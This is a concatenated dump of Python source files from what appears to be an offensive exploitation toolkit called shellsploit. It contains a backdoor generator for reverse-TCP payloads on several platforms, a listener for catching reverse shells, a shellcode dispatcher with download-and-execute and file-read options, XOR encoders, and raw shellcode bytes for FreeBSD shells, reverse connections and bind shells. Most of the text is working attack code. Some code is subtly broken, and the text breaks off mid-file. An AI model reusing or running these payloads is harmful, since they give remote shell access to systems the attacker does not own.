8 | 9 | 10 | """ 11 | Except AES every function is working on 2x and 3x.We'll fix it soon and add couple of things to .. 12 | 13 | ıf you cant install that damn thing into windows follow these steps; 14 | Ref : http://stackoverflow.com/a/11405769 15 | 1) Install : https://www.microsoft.com/en-us/download/details.aspx?id=44266 16 | 2) easy_install http://www.voidspace.org.uk/python/pycrypto-2.6.1/pycrypto-2.6.1.win32-py2.7.exe 17 | 18 | """ 19 | 20 | 21 | def base64(TEXT, choice): 22 | from base64 import b64encode, b64decode 23 | return b64encode(TEXT.encode('utf-8')).decode('utf-8') if choice == "encode" else b64decode(TEXT).decode("utf-8") 24 | 25 | 26 | def base32(TEXT, choice): 27 | from base64 import b32encode, b32decode 28 | return b32encode(TEXT.encode('utf-8')).decode('utf-8') if choice == "encode" else b32decode(TEXT).decode("utf-8") 29 | 30 | 31 | def base16(TEXT, choice): 32 | from base64 import b16encode, b16decode 33 | return b16encode(TEXT.encode('utf-8')).decode('utf-8') if choice == "encode" else b16decode(TEXT).decode("utf-8") 34 | 35 | 36 | def hex_(TEXT, choice): 37 | from codecs import encode, decode 38 | return encode(TEXT.encode('utf-8'), "hex").decode('utf-8') if choice == "encode" else decode(TEXT, "").decode("utf-8") 39 | 40 | 41 | def md5(TEXT): 42 | from hashlib import md5 43 | return md5(TEXT.encode("utf-8")).hexdigest() 44 | 45 | 46 | def sha1(TEXT): 47 | from hashlib import sha1 48 | return sha1(TEXT.encode("utf-8")).hexdigest() 49 | 50 | 51 | def sha224(TEXT): 52 | from hashlib import sha224 53 | return sha224(TEXT.encode("utf-8")).hexdigest() 54 | 55 | 56 | def sha256(TEXT): 57 | from hashlib import sha256 58 | return sha256(TEXT.encode("utf-8")).hexdigest() 59 | 60 | 61 | def sha384(TEXT): 62 | from hashlib import sha384 63 | return sha384(TEXT.encode("utf-8")).hexdigest() 64 | 65 | 66 | def sha512(TEXT): 67 | from hashlib import sha512 68 | return sha512(TEXT.encode("utf-8")).hexdigest() 69 | 70 | 71 | def AES(TEXT, KEY, choice): 72 | from sys import version_info 73 | from base64 import b64encode, b64decode 74 | 75 | try: 76 | from Crypto.Cipher import AES 77 | from Crypto import Random 78 | except ImportError: 79 | print("\npycrypto must be installed.\n") 80 | return False 81 | 82 | # AES key must be either 16, 24, or 32 bytes long 83 | BS = len(KEY) if len(KEY) % 16 == 0 or len( 84 | KEY) % 24 == 0 or len(KEY) % 32 == 0 else False 85 | pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS) 86 | unpad = lambda s: s[:-ord(s[len(s) - 1:])] 87 | 88 | if choice == "encode": 89 | raw = pad(TEXT) 90 | iv = Random.new().read(AES.block_size) 91 | cipher = AES.new(KEY, AES.MODE_CBC, iv) 92 | return b64encode(iv + cipher.encrypt(raw)) if version_info[0] == 2 else b64encode(iv + cipher.encrypt(raw), "encode").decode("utf-8") 93 | else: 94 | enc = b64decode(TEXT) 95 | iv = enc[:16] 96 | cipher = AES.new(KEY, AES.MODE_CBC, iv) 97 | return unpad(cipher.decrypt(enc[16:])) if version_info[0] == 2 else unpad(cipher.decrypt(enc[16:])).decode("utf-8") 98 | -------------------------------------------------------------------------------- /shellsploit/Session/generator.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/Shellsploit 5 | # LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | 9 | def process(data, HOST, PORT, ENCODER=False, logger=True): 10 | logfile = None 11 | extension = None 12 | if logger == True: 13 | from random import randint 14 | from os import path 15 | while True: 16 | logfile = "{0}.".format(str(randint(0, 999999999))) 17 | if not path.isfile(logfile): 18 | break 19 | else: 20 | logfile = logger 21 | 22 | if data == "backdoors/linux86/reverse_tcp": 23 | from .backdoors.main import linx86reverse_tcp 24 | extension = "elf" 25 | logs = linx86reverse_tcp(HOST, PORT) 26 | elif data == "backdoors/osx86/reverse_tcp": 27 | from .backdoors.main import macosx86reverse_tcp 28 | extension = "macho" 29 | logs = macosx86reverse_tcp(HOST, PORT) 30 | elif data == "backdoors/linux64/reverse_tcp": 31 | from .backdoors.main import linx64reverse_tcp 32 | extension = "elf" 33 | logs = linx64reverse_tcp(HOST, PORT) 34 | # elif data == "osx/x64/reverse_tcp": 35 | # pass 36 | # elif data == "windows/x86/reverse_tcp": 37 | #from backdoors.main import winreverse_tcp 38 | #extension = "exe" 39 | #logs = winreverse_tcp( HOST,PORT) 40 | 41 | # elif data == "backdoors/php/reverse_tcp": 42 | # pass 43 | # elif data == "backdoors/asp/reverse_tcp": 44 | # pass 45 | # elif data == "backdoors/jsp/reverse_tcp": 46 | # pass 47 | # elif data == "backdoors/war/reverse_tcp": 48 | # pass 49 | 50 | elif data == "backdoors/unix/python/reverse_tcp": 51 | from .backdoors.main import pyreverse_tcp 52 | extension = "py" 53 | logs = pyreverse_tcp(HOST, PORT) 54 | elif data == "backdoors/unix/perl/reverse_tcp": 55 | from .backdoors.main import plreverse_tcp 56 | extension = "pl" 57 | logs = plreverse_tcp(HOST, PORT) 58 | elif data == "backdoors/unix/bash/reverse_tcp": 59 | from .backdoors.main import shreverse_tcp 60 | extension = "sh" 61 | logs = shreverse_tcp(HOST, PORT) 62 | elif data == "backdoors/unix/ruby/reverse_tcp": 63 | from .backdoors.main import rbreverse_tcp 64 | extension = "rb" 65 | logs = rbreverse_tcp(HOST, PORT) 66 | elif data == "backdoors/windows/asm/reverse_tcp": 67 | from .backdoors.main import asmreverse_tcp 68 | extension = "s" 69 | logs = asmreverse_tcp(HOST, PORT) 70 | elif data == "backdoors/windows/ps/reverse_tcp": 71 | from .backdoors.main import powershell 72 | extension = "ps1" 73 | logs = powershell(HOST, PORT) 74 | 75 | savefile = [logfile if logger != True else logfile + extension] 76 | if data in [ 77 | "backdoors/linux86/reverse_tcp", 78 | "backdoors/osx86/reverse_tcp", 79 | "backdoors/osx64/reverse_tcp", 80 | "backdoors/windowsx86/reverse_tcp" 81 | ]: 82 | 83 | exploit = open(savefile[0], "wb") 84 | exploit.write(logs.decode("hex")) 85 | else: 86 | exploit = open(savefile[0], "w") 87 | exploit.write(logs) 88 | exploit.close() 89 | 90 | import os 91 | path = os.getcwd() + os.sep + savefile[0].replace("\n", "") 92 | if ENCODER: 93 | from shell.encoders.py.starter import control 94 | control(payload=ENCODER, files=[path]) 95 | print("\n\n\t Exploit Location : {0} \n\n".format(path)) 96 | -------------------------------------------------------------------------------- /shellsploit/Session/netcat.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM, SOL_SOCKET, SO_REUSEADDR 3 | from threading import Thread 4 | from select import select 5 | from time import sleep 6 | from sys import exit 7 | 8 | listening = False 9 | clisock = None 10 | done = False 11 | 12 | #Beta script for listener. 13 | #Same effect nc -vlp [PORT] 14 | 15 | 16 | #Greetz: 17 | #Goodies 18 | #https://twitter.com/GoodiesHQ 19 | 20 | 21 | 22 | try: 23 | input = raw_input 24 | except NameError: 25 | pass 26 | 27 | def listen(port=4444): 28 | global clisock, listening, done 29 | s = socket(AF_INET, SOCK_STREAM) 30 | s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 31 | s.bind(('0.0.0.0', port)) 32 | s.listen(3) 33 | listening = True 34 | sock, addr = s.accept() 35 | clisock = sock 36 | print("Client connected from {}".format(addr)) 37 | data = "" 38 | while listening: 39 | try: 40 | rr, _, _ = select([sock,], [], [], 1) 41 | if rr: 42 | data = sock.recv(1024) 43 | print("{}".format(data), end="") 44 | except: 45 | exit() 46 | print("Done listening.") 47 | done = True 48 | 49 | def write(): 50 | global clisock, listening, done 51 | while True: 52 | if clisock: 53 | data = input() 54 | if data.strip().lower() in ["exit", "quit"]: 55 | clisock.close() 56 | exit() 57 | listening = False 58 | while not done: sleep(0.1) 59 | break 60 | _, wr, _ = select([], [clisock,], [], 1) 61 | if wr: 62 | clisock.sendall(data + "\n") 63 | else: 64 | pass 65 | 66 | 67 | def nc( PORT=4444): 68 | listenThread = Thread(target=listen, args=(int(PORT),)) 69 | writeThread = Thread(target=write) 70 | listenThread.start() 71 | writeThread.start() 72 | -------------------------------------------------------------------------------- /shellsploit/__init__.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from lib.base.framework import ShellsploitFramework 10 | 11 | 12 | class Engine(ShellsploitFramework): 13 | def __init__(self): 14 | ShellsploitFramework.__init__(self) 15 | self.disassembly = None 16 | 17 | def shellcode(self, shellcode, **kwargs): 18 | from .database.generator import generator 19 | if shellcode == "linux86/binsh_spawn": 20 | self.disassembly = generator("linux86", "binsh_spawn") 21 | elif shellcode == "linux86/read": 22 | self.disassembly = generator("linux86", "read", FILE=kwargs["file"]) 23 | elif shellcode == "linux86/exec": 24 | self.disassembly = generator("linux86", "exec", COMMAND=kwargs["command"]) 25 | #elif shellcode == "linux86/download&exec": 26 | # url = kwargs["url"].replace("http://", "").replace("https://", "").replace("www.", "") 27 | # self.disassembly = generator("linux86", "download&exec", URL=url) 28 | elif shellcode == "linux86/chmod": 29 | self.disassembly = generator("linux86", "chmod", FILE=kwargs["file"]) 30 | elif shellcode == "linux86/tcp_bind": 31 | self.disassembly = generator("linux86", "tcp_bind", port=kwargs["port"]) 32 | elif shellcode == "linux86/reverse_tcp": 33 | self.disassembly = generator("linux86", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 34 | if shellcode == "linux64/binsh_spawn": 35 | self.disassembly = generator("linux64", "binsh_spawn") 36 | elif shellcode == "linux64/tcp_bind": 37 | self.disassembly = generator("linux64", "tcp_bind", port=kwargs["port"]) 38 | elif shellcode == "linux64/reverse_tcp": 39 | self.disassembly = generator("linux64", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 40 | elif shellcode == "linux64/read": 41 | self.disassembly = generator("linux64", "read", FILE=kwargs["file"]) 42 | if shellcode == "linux/read": 43 | self.disassembly = generator("linux", "read", FILE=kwargs["file"]) 44 | elif shellcode == "linux/binsh_spawn": 45 | self.disassembly = generator("linux", "binsh_spawn") 46 | elif shellcode == "linux/tcp_bind": 47 | self.disassembly = generator("linux", "tcp_bind", port=kwargs["port"]) 48 | elif shellcode == "linux/reverse_tcp": 49 | self.disassembly = generator("linux", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 50 | elif shellcode == "osx86/tcp_bind": 51 | self.disassembly = generator("osx86", "tcp_bind", port=kwargs["port"]) 52 | elif shellcode == "osx86/binsh_spawn": 53 | self.disassembly = generator("osx86", "binsh_spawn") 54 | elif shellcode == "osx86/reverse_tcp": 55 | self.disassembly = generator("osx86", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 56 | elif shellcode == "osx64/binsh_spawn": 57 | self.disassembly = generator("osx64", "binsh_spawn") 58 | elif shellcode == "osx64/tcp_bind": 59 | self.disassembly = generator("osx64", "tcp_bind", port=kwargs["port"]) 60 | elif shellcode == "osx64/reverse_tcp": 61 | self.disassembly = generator("osx64", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 62 | elif shellcode == "freebsd_x86/binsh_spawn": 63 | self.disassembly = generator("freebsdx86", "binsh_spawn") 64 | elif shellcode == "freebsd_x86/read": 65 | self.disassembly = generator("freebsdx86", "read", FILE=kwargs["file"]) 66 | elif shellcode == "freebsd_x86/reverse_tcp": 67 | self.disassembly = generator("freebsdx86", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 68 | elif shellcode == "freebsd_x86/reverse_tcp2": 69 | self.disassembly = generator("freebsdx86", "reverse_tcp2", ip=kwargs["ip"], port=kwargs["port"]) 70 | elif shellcode == "freebsd_x86/exec": 71 | self.disassembly = generator("freebsdx86", "exec", COMMAND=kwargs["command"]) 72 | elif shellcode == "freebsd_x86/tcp_bind": 73 | self.disassembly = generator("freebsdx86", "tcp_bind", port=kwargs["port"]) 74 | elif shellcode == "freebsd_x64/binsh_spawn": 75 | self.disassembly = generator("freebsdx64", "binsh_spawn") 76 | elif shellcode == "freebsd_x64/tcp_bind": 77 | self.disassembly = generator("freebsdx64", "tcp_bind", port=kwargs["port"], PASSWORD=kwargs["password"]) 78 | elif shellcode == "freebsd_x64/reverse_tcp": 79 | self.disassembly = generator("freebsdx64", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 80 | elif shellcode == "freebsd_x64/exec": 81 | self.disassembly = generator("freebsdx64", "exec", COMMAND=kwargs["command"]) 82 | elif shellcode == "linux_arm/chmod": 83 | self.disassembly = generator("linux_arm", "chmod", FILE=kwargs["file"]) 84 | elif shellcode == "linux_arm/binsh_spawn": 85 | self.disassembly = generator("linux_arm", "binsh_spawn") 86 | elif shellcode == "linux_arm/reverse_tcp": 87 | self.disassembly = generator("linux_arm", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 88 | elif shellcode == "linux_arm/exec": 89 | self.disassembly = generator("linux_arm", "exec", COMMAND=kwargs["command"]) 90 | elif shellcode == "linux_mips/reverse_tcp": 91 | self.disassembly = generator("linux_mips", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 92 | elif shellcode == "linux_mips/binsh_spawn": 93 | self.disassembly = generator("linux_mips", "binsh_spawn") 94 | elif shellcode == "linux_mips/chmod": 95 | self.disassembly = generator("linux_mips", "chmod", FILE=kwargs["file"]) 96 | elif shellcode == "linux_mips/tcp_bind": 97 | self.disassembly = generator("linux_mips", "tcp_bind", port=kwargs["port"]) 98 | elif shellcode == "windows/messagebox": 99 | self.disassembly = generator("windows", "messagebox", MESSAGE=kwargs["message"]) 100 | elif shellcode == "windows/download&execute": 101 | self.disassembly = generator("windows", "downloandandexecute", URL=kwargs["url"], FILENAME=kwargs["filename"]) 102 | elif shellcode == "windows/exec": 103 | self.disassembly = generator("windows", "exec", COMMAND=kwargs["command"]) 104 | elif shellcode == "windows/reverse_tcp": 105 | self.disassembly = generator("windows", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 106 | elif shellcode == "windows/tcp_bind": 107 | self.disassembly = generator("windows", "tcp_bind", port=kwargs["port"]) 108 | elif shellcode == "solarisx86/binsh_spawn": 109 | self.disassembly = generator("solarisx86", "binsh_spawn") 110 | elif shellcode == "solarisx86/read": 111 | self.disassembly = generator("solarisx86", "read", FILE=kwargs["file"]) 112 | elif shellcode == "solarisx86/reverse_tcp": 113 | self.disassembly = generator("solarisx86", "reverse_tcp", ip=kwargs["ip"], port=kwargs["port"]) 114 | elif shellcode == "solarisx86/tcp_bind": 115 | self.disassembly = generator("solarisx86", "tcp_bind", port=kwargs["port"]) 116 | return self.disassembly 117 | 118 | 119 | def encode(self, encoder, iteration, shellcode): 120 | if encoder == "x86/xor_b3m": 121 | from .encoders.shellcode.xor_b3m import prestart 122 | self.disassembly = prestart(self.disassembly.replace("\\x", ""), iteration) 123 | elif encoder == "x86/xor": 124 | from .encoders.shellcode.xor import prestart 125 | self.disassembly = prestart(self.disassembly.replace("\\x", ""), iteration) 126 | return self.disassembly 127 | -------------------------------------------------------------------------------- /shellsploit/core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/core/__init__.py -------------------------------------------------------------------------------- /shellsploit/core/backdoors.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team---------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/Shellsploit 5 | # LICENSE : https://github.com/b3mb4m/Shellsploit/blob/master/LICENSE 6 | #------------------------------------------------------------------# 7 | 8 | from .color import * 9 | 10 | 11 | # That encoders can be use on "injectors" .. 12 | def encoderlist(require=False): 13 | if require != False: 14 | data = [ 15 | "encoders/py/bzip2", 16 | "encoders/py/gzip", 17 | "encoders/shellcode/intel/x86/xor86.py", 18 | "encoders/shellcode/intel/x86/xor_b3m.py", 19 | "encoders/shellcode/intel/x86/xor64.py", 20 | ] 21 | return data 22 | else: 23 | print (bcolors.GREEN + """ 24 | 25 | Python 26 | ======== 27 | 28 | encoders/py/bzip2 29 | encoders/py/gzip 30 | 31 | 32 | Shellcode 33 | ========== 34 | 35 | encoders/shellcode/intel/x86/xor86.py 36 | encoders/shellcode/intel/x86/xor_b3m.py 37 | 38 | 39 | """ + bcolors.ENDC) 40 | 41 | # encoders/shellcode/intel/x86/xor64.py 42 | 43 | 44 | def backdoorlist(require=False): 45 | if require != False: 46 | data = [ 47 | "backdoors/linux86/reverse_tcp", 48 | "backdoors/linux64/reverse_tcp", 49 | "backdoors/osx86/reverse_tcp", 50 | "backdoors/osx64/reverse_tcp", 51 | "backdoors/windows/x86/reverse_tcp", 52 | 53 | # "backdoors/php/reverse_tcp", 54 | # "backdoors/asp/reverse_tcp", 55 | # "backdoors/jsp/reverse_tcp", 56 | # "backdoors/war/reverse_tcp", 57 | 58 | "backdoors/unix/python/reverse_tcp", 59 | "backdoors/unix/perl/reverse_tcp", 60 | "backdoors/unix/bash/reverse_tcp", 61 | "backdoors/unix/ruby/reverse_tcp", 62 | "backdoors/windows/asm/reverse_tcp", 63 | "backdoors/windows/ps/reverse_tcp", 64 | 65 | 66 | ] 67 | return data 68 | else: 69 | print (bcolors.GREEN + """ 70 | 71 | Binaries 72 | ========== 73 | 74 | backdoors/linux86/reverse_tcp 75 | backdoors/linux64/reverse_tcp 76 | backdoors/osx86/reverse_tcp 77 | backdoors/windowsx86/reverse_tcp - [Passive] 78 | backdoors/windowsx64/reverse_tcp - [Passive] 79 | 80 | 81 | Scripting Payloads 82 | =================== 83 | 84 | backdoors/unix/python/reverse_tcp 85 | backdoors/unix/perl/reverse_tcp 86 | backdoors/unix/bash/reverse_tcp 87 | backdoors/unix/ruby/reverse_tcp 88 | backdoors/windows/asm/reverse_tcp 89 | backdoors/windows/ps/reverse_tcp 90 | 91 | """ + bcolors.ENDC) 92 | 93 | 94 | # Web Payloads 95 | #============= 96 | 97 | # backdoors/php/reverse_tcp - [Passive] 98 | # backdoors/asp/reverse_tcp - [Passive] 99 | # backdoors/jsp/reverse_tcp - [Passive] 100 | # backdoors/war/reverse_tcp - [Passive] 101 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx64/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/FreeBSDx64/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx64/bin_sh.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Maycon M. Vitali" 6 | Shellcode.info["name"] = "FreeBSDx64 - execve shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/13279/", 9 | ] 10 | Shellcode.info["size"] = 31 11 | Shellcode.info["payload"] = [ 12 | r"\x48\x31\xc0\x99\xb0\x3b" 13 | r"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" 14 | r"\x48\xc1\xef\x08\x57\x48\x89\xe7\x57\x52" 15 | r"\x48\x89\xe6\x0f\x05" 16 | ] 17 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx64/execc.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Unkown" 6 | Shellcode.info["name"] = "FreeBSDx64 - exec shellcode" 7 | 8 | def __init__(self, **kwargs): 9 | Shellcode.info["size"] = 29 + Shellcode().getsize(kwargs["execommand"]) 10 | Shellcode.info["payload"] = [ 11 | r"\x48\x31\xd2\xe8\x06\x00\x00\x00\x68\x65\x6c" 12 | r"\x6c\x6f\x00\x5f\x52\x57\x48\x89\xe6\x48\x31" 13 | r"\xc0\x48\x83\xc8\x3b\x0f\x05" 14 | + kwargs["execommand"] 15 | ] 16 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx64/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Unkown" 6 | Shellcode.info["name"] = "FreeBSDx64 - reverse_tcp shellcode" 7 | 8 | def __init__(self, **kwargs): 9 | Shellcode.info["payload"] = [ 10 | r"\x31\xc0\x83\xc0\x61\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2" 11 | r"\x0f\x05\x49\x89\xc4\x48\x89\xc7\x31\xc0\x83\xc0\x62\x48" 12 | r"\x31\xf6\x56\x48\xbe\x00\x02" 13 | + kwargs["host"] + 14 | +kwargs["lport"] + 15 | r"\x56" 16 | r"\x48\x89\xe6\x6a\x10\x5a\x0f\x05\x4c\x89\xe7\x31\xc0\x83" 17 | r"\xc0\x5a\x48\x31\xf6\x0f\x05\x31\xc0\x83\xc0\x5a\x48\xff" 18 | r"\xc6\x0f\x05\x48\x31\xc0\x31\xc0\x83\xc0\x3b\xe8\x08\x00" 19 | r"\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24" 20 | r"\x48\x31\xd2\x52\x57\x48\x89\xe6\x0f\x05" 21 | 22 | ] 23 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx64/tcp_bind.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "dracyrys" 6 | Shellcode.info["name"] = "FreeBSDx64 - tcp_bind shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-865.php", 9 | ] 10 | Shellcode.info["size"] = 127 11 | 12 | def __init__(self, **kwargs): 13 | Shellcode.info["payload"] = [ 14 | r"\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99" 15 | r"\x0f\x05\x48\x97\xba\xff\x02" 16 | + kwargs["lport"] + 17 | r"\x80\xf2\xff\x52\x48\x89\xe6\x99\x04\x66\x80" 18 | r"\xc2\x10\x0f\x05\x04\x6a\x0f\x05\x04\x1e" 19 | r"\x48\x31\xf6\x99\x0f\x05\x48\x97\x6a\x03" 20 | r"\x58\x52\x48\x8d\x74\x24\xf0\x80\xc2\x10" 21 | r"\x0f\x05\x48\xb8" 22 | + kwargs["password"] + 23 | r"\x57\x48\x8d\x3e\x48\xaf\x74\x08" 24 | r"\x48\x31\xc0\x48\xff\xc0\x0f\x05\x5f\x48" 25 | r"\x89\xd0\x48\x89\xfe\x48\xff\xce\xb0\x5a" 26 | r"\x0f\x05\x75\xf7\x99\x04\x3b\x48\xbb\x2f" 27 | r"\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53\x54" 28 | r"\x5f\x52\x57\x54\x5e\x0f\x05" 29 | ] 30 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx86/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/FreeBSDx86/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx86/bin_sh.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "IZ" 6 | Shellcode.info["name"] = "FreeBSDx86 - execve shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-170.php" 9 | ] 10 | Shellcode.info["size"] = 23 11 | Shellcode.info["payload"] = [ 12 | r"\x31\xc0\x50\x68\x2f\x2f\x73\x68" 13 | r"\x68\x2f\x62\x69\x6e\x89\xe3" 14 | r"\x50\x54\x53\x50\xb0\x3b\xcd\x80" 15 | ] 16 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx86/execc.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "s0t4ipv6" 6 | Shellcode.info["name"] = "FreeBSDx86 - exec shellcode" 7 | shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-91.php", 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = 44 + Shellcode().getsize(kwargs["execommand"]) 13 | Shellcode.info["payload"] = [ 14 | r"\xeb\x25\x59\x31\xc0\x50\x68\x6e\x2f\x73\x68" 15 | r"\x68\x2f\x2f\x62\x69\x89\xe3" 16 | r"\x50\x66\x68\x2d\x63\x89\xe7\x50" 17 | r"\x51\x57\x53\x89\xe7\x50\x57\x53" 18 | r"\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff" 19 | + kwargs["execommand"] 20 | ] 21 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx86/read.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "sm4x" 6 | Shellcode.info["name"] = "FreeBSDx86 - file_reader shellcode" 7 | 8 | def __init__(self, **kwargs): 9 | Shellcode.info["size"] = 46 + Shellcode().getsize(kwargs["file"]) 10 | Shellcode.info["payload"] = [ 11 | r"\x31\xc0\x50\x50\xb0\x17\xcd\x80\xeb\x1f" 12 | r"\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62" 13 | r"\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50" 14 | r"\x52\x53\xb0\x3b\x50\xcd\x80\x50\x50\xcd" 15 | r"\x80\xe8\xdc\xff\xff\xff" 16 | + kwargs["file"] 17 | 18 | ] 19 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx86/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "sm4x" 6 | Shellcode.info["name"] = "FreeBSDx86 - reverse_tcp shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-167.php", 9 | ] 10 | Shellcode.info["size"] = 90 11 | 12 | def __init__(self, **kwargs): 13 | Shellcode.info["payload"] = [ 14 | r"\x31\xc0\x50\x50\xb0\x17\x50\xcd\x80\x50" 15 | r"\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89" 16 | r"\xc2\x68" 17 | + kwargs["host"] + 18 | r"\x68" 19 | + kwargs["lport"] + 20 | r"\x89\xe0\x6a\x10\x50\x52\x31\xc0\xb0" 21 | r"\x62\x50\xcd\x80\x75\x24\xb1\x03\x31\xdb" 22 | r"\x53\x52\xb0\x5a\x50\xcd\x80\x43\xe2\xf6" 23 | r"\x31\xc0\x66\x68\x04\x04\x8d\x8c\x24\xfc" 24 | r"\xfb\xff\xff\x51\x52\xb0\x03\x50\xcd\x80" 25 | r"\xff\xe1\x31\xc0\x40\x50\x50\xcd\x80" 26 | ] 27 | -------------------------------------------------------------------------------- /shellsploit/database/FreeBSDx86/reverse_tcp2.py: -------------------------------------------------------------------------------- 1 | #https://packetstormsecurity.com/files/97746/FreeBSD-x86-Connect-Back-Shellcode.html 2 | 3 | #/* 4 | # -------------- FreeBSD/x86 - connect back /bin/sh. 81 bytes ---------------- 5 | # * AUTHOR : Tosh 6 | # * OS : BSDx86 (Tested on FreeBSD 8.1) 7 | # * EMAIL : tosh@tuxfamily.org 8 | # */ 9 | 10 | def reverse_tcp2(ip, port): 11 | shellcode = r"\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x68" 12 | shellcode += ip 13 | shellcode += r"\x66\x68" 14 | shellcode += port 15 | shellcode += r"\x66\x68\x01\x02\x89" 16 | shellcode += r"\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" 17 | shellcode += r"\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" 18 | shellcode += r"\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" 19 | shellcode += r"\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80" 20 | return shellcode 21 | 22 | 23 | """ 24 | #include 25 | #include 26 | #include 27 | 28 | char shellcode [] = "\x31\xc0\x50\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" 29 | "\x68\x7f\x00\x00\x01\x66\x68\x05\x39\x66\x68\x01\x02\x89" 30 | "\xe1\x6a\x10\x51\x52\x31\xc0\xb0\x62\x50\xcd\x80\x31\xc9" 31 | "\x51\x52\x31\xc0\xb0\x5a\x50\xcd\x80\xfe\xc1\x80\xf9\x03" 32 | "\x75\xf0\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" 33 | "\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"; 34 | 35 | void change_shellcode(const char *ip, unsigned short port) 36 | { 37 | *((unsigned long*)(shellcode + 15)) = inet_addr(ip); 38 | *((unsigned short*)(shellcode + 21)) = htons(port); 39 | } 40 | void print_shellcode(void) 41 | { 42 | int i; 43 | for(i = 0; i < sizeof(shellcode) - 1; i++) 44 | { 45 | printf("\\x%.2x", 